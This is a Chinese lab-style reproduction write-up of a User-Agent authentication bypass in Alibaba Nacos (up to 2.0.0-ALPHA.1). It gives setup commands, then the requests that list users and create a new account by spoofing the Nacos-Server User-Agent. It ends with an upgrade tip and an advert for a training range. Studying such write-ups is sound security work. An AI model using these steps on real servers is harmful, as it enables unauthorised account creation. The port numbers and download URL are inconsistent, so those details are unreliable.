0x00简介

Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集，帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。

0x01漏洞概述

Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的认证绕过漏洞。通过该漏洞，攻击者可以进行任意操作，包括创建新用户并进行登录后操作。

0x02影响版本

Nacos <= 2.0.0-ALPHA.1

0x03环境搭建

1、在Nacos的GitHub项目地址下载nacos2.0.0-ALPHA.1版本的，下载地址：

wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1

2.解压下载的安装，进入bin目录运行启动 //启动需要java8环境

tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz

cd nacos/bin

./startup.sh -m standalone

3、在浏览访问http://your-ip:8488/nacos，搭建成功 //默认账号密码为：nacos/nacos

0x04漏洞复现

1、在url处添加访问一下网址即可查看到用户列表

/nacos/v1/auth/users?pageNo=1&pageSize=100

2、访问以下链接并使用burp抓包，然后把get请求改为post，把修改User-Agent头改为Nacos-Server

http://your-ip:8848/nacos/v1/auth/users

3、构造数据包添加一个demo用户，然后发送POST请求，返回为200，表示创建用户成功

username=demo&password=demo

4、回到登录界面，使用添加的账号密码进行登录，可以看到登录成功

0x05修复建议

1、官方已发布安全版本，建议下载或升级至最新版本

在这里，给大家介绍一下“东塔攻防世界靶场”

2020年12月，东塔攻防世界靶场正式对外提供注册，各位小伙伴可通过注册后进行体验。新注册用户可获得一定的积分，对于靶场使用获取正确的Key后，也可以获取一定的经验值，经验值根据排名会不定期给予一定的奖励。

并且，在操作过程中，针对出现的Bug和安全漏洞问题可以和塔塔子提出，审核通过后可以获得相应的奖励积分。

东塔攻防世界网站不定时推出可免费限时使用的靶场，具体可关注东塔网络安全学院推出的一系列活动或添加东塔客服了解详情。

东塔攻防世界靶场主要分为在线靶场和职业体系两大特色板块。且平台内的靶场会定期更新内容，尤其是最新漏洞复现的一些文章和靶场，会优先在靶场中提供环境让大家体验。

东塔攻防世界网站会不定期限时免费推出最新的一些复现的靶场，以供学习交流，给了大家充分体验和使用靶场的机会。

具体可关注东塔网络安全学院推出的一系列活动或添加东塔客服wx（dongtakefu）了解详情。

除了以上介绍的内容，还有更多宝藏区域，更强大的功能，等你来寻宝！

详戳下方“东塔攻防世界靶场”网址，Get一波新世界

https://labs.do-ta.com

来源：freebuf.com 2021-02-20 11:12:06 by: 东塔安全学院